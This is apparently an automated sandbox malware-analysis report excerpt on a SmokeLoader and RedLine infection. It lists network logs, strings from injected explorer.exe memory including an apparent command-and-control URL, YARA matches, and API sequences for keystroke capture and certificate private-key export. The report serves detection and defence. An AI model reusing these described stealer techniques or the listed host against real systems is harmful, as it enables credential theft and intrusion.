Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:29:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:30:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2095504231.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2094847936.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094289006.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094815551.0000000008870000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.2098614034.000000000C8D3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2097959116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2095504231.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2093454201.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2092180745.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003059000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/;
Source: explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000A.00000002.3153296640.000000000302B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/earch.php
Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/search.php8
Source: explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2097959116.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50027 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:50033 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Windows\SysWOW64\explorer.exe Code function: 18_2_02FE162B GetKeyboardState,ToUnicode, 18_2_02FE162B
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe Code function: 8_2_00007FF6DFE23220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx, 8_2_00007FF6DFE23220

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
